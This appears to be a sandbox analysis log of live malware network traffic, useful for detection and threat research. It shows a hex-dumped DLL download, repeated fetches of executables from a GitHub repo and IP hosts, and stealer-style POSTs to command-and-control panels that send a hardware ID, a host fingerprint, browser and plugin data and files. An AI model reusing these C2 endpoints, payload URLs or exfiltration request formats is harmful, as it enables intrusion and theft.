00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 21 Dec 2024 21:18:08 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
                              Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/refs/heads/main/ktyihkdfesf.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/refs/heads/main/biyjdfjadaw.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/ktyihkdfesf.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/raw/refs/heads/main/biyjdfjadaw.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/refs/heads/main/ktyihkdfesf.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /Urijas/moperats/refs/heads/main/biyjdfjadaw.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                              Source: global trafficHTTP traffic detected: GET /files/Krokodyl02/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 36 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019663001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 36 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019664001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/karl/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 36 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019667001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/unique1/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019668001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 496863Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 38 31 35 38 30 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 36 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019669001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=qVzcqauEInmPu2zy1734815809 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
                              Source: global trafficHTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 37 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019670001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 37 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019671001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 37 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019672001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 39 42 37 35 41 45 30 31 32 34 46 34 30 33 33 30 36 30 30 37 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 2d 2d 0d 0a Data Ascii: ------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="hwid"19B75AE0124F4033060071------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="build"stok------HIDAFHDHCBGDGCBGCGII--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBAAFCAFCBKFHJJJKKFHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 2d 2d 0d 0a Data Ascii: ------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------IEBAAFCAFCBKFHJJJKKFContent-Disposition: form-data; name="message"browsers------IEBAAFCAFCBKFHJJJKKF--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGIIHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 2d 2d 0d 0a Data Ascii: ------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="message"plugins------HIDAFHDHCBGDGCBGCGII--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJKHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 2d 2d 0d 0a Data Ascii: ------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="message"fplugins------DAKFIDHDGIEGCAKFIIJK--
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAAHost: 185.215.113.206Content-Length: 8523Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 37 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019673001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEHost: 185.215.113.206Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIIIECBGDHJJKFIDAKJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 49 49 45 43 42 47 44 48 4a 4a 4b 46 49 44 41 4b 4a 2d 2d 0d 0a Data Ascii: ------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGIIIECBGDHJJKFIDAKJContent-Disposition: form-data; name="file"------EGIIIECBGDHJJKFIDAKJ--
                              Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 39 36 37 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1019674001&unit=246122658369
                              Source: global trafficHTTP traffic detected: GET /files/geopoxid/random.exe HTTP/1.1Host: 31.41.244.11
                              Source: global trafficHTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 462Content-Type: multipart/form-data; boundary=------------------------pRlNtWBsRuZjLrYb6RpUTOData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 52 6c 4e 74 57 42 73 52 75 5a 6a 4c 72 59 62 36 52 70 55 54 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4a 61 77 69 73 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a d0 3a aa 91 e1 18 a8 82 42 14 ba 0f 2d ad a7 fd cd f4 a3 e0 61 df f7 ca c7 31 a5 bf e9 ee 85 43 ef 84 ad aa c4 92 01 5c 77 3c 23 46 ec f3 fc e7 4a d6 5f 18 06 51 d5 e0 41 9f 76 af 55 af f4 61 fb eb 27 be ac 27 9a 74 40 db a1 11 c2 e8 67 39 01 46 4e c9 5c b6 0f 0b 34 90 da 18 81 73 80 3e 78 a7 94 cd 60 11 87 f5 a1 55 1e 1f e4 68 7f b5 bf 1c 41 0e 54 c7 31 ea 04 46 87 7d fe 91 84 08 0a 45 1c 59 d6 61 6b da 06 48 a7 d5 55 97 ec 94 3a d9 4f 2e 8b 02 ed a8 73 75 0b af 0e b7 e7 23 c2 4f a9 6d 91 c6 b5 c5 e1 a2 8d 85 58 45 42 3c 34 7b 03 b1 b0 96 38 05 26 e6 45 00 b5 09 dc a7 b6 18 57 d1 9c 6a 61 d0 3c 7e 66 5c c6 21 59 89 82 bc 5c f1 5f 2d d2 46 48 31 d2 49 55 22 3d 3e bb f2 12 70 ec ff 0c b3 3f 9c 7b 81 5a 6a 6b 6d 30 53 58 53 87 9e 18 d9 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 52 6c 4e 74 57 42 73 52 75 5a 6a 4c 72 59 62 36 52 70 55 54 4f 2d 2d 0d 0a Data Ascii: --------------------------pRlNtWBsRuZjLrYb6RpUTOContent-Disposition: form-data; name="file"; filename="Jawisu.bin"Content-Type: application/octet-stream:B-a1C\w<#FJ_QAvUa''t@g9FN\4s>x`UhAT1F}EYakHU:O.su#OmXEB<4{8&EWja<~f\!Y\_-FH1IU"=>p?{Zjkm0SXS--------------------------pRlNtWBsRuZjLrYb6RpUTO--
